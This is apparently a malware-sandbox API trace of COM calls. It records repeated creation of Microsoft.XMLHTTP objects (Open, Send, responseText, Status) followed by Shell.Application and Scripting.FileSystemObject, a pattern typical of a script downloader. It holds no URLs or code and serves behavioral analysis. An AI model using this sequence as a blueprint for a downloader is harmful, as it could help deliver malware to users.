	[0372.947] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.947] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0372.947] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0372.947] ??2@YAPEAX_K@Z () returned 0x62f310
	[0372.947] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f310) 
	[0372.947] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.947] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0372.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0372.947] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0372.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.948] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.948] longjmp () 
	[0372.948] longjmp () 
	[0372.948] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0372.948] SysStringLen (param_1=0x0) returned 0x0
	[0372.948] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0372.948] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0372.948] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0372.949] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0372.949] ??2@YAPEAX_K@Z () returned 0x62f330
	[0372.949] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0372.949] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0372.949] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.949] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0372.949] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0372.950] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0372.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0374.420] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0374.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0374.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0374.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0374.421] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0374.421] SysStringLen (param_1=0x0) returned 0x0
	[0374.421] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0374.421] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0374.421] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0374.421] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0374.422] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0374.422] ??2@YAPEAX_K@Z () returned 0x62f350
	[0374.422] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0374.422] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0374.422] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0374.422] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0374.422] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0374.422] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0374.422] SysStringLen (param_1=0x0) returned 0x0
	[0374.422] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0374.426] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0374.426] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0374.426] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0374.426] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0374.426] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0374.426] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0374.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0374.971] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0374.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0374.973] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.973] SysStringLen (param_1=0x0) returned 0x0
	[0374.973] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.973] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0374.973] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0374.973] ??2@YAPEAX_K@Z () returned 0x62f330
	[0374.973] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0374.973] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.973] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0374.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0374.974] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0374.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.974] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.976] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.976] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.976] SysStringLen (param_1=0x0) returned 0x0
	[0374.976] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0374.977] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0374.977] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0374.977] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0374.977] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0374.977] ??2@YAPEAX_K@Z () returned 0x62f310
	[0374.977] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f310) 
	[0374.977] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0374.977] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0374.977] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0374.977] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0374.977] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0374.978] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0374.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0374.978] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0374.978] SysStringLen (param_1=0x0) returned 0x0
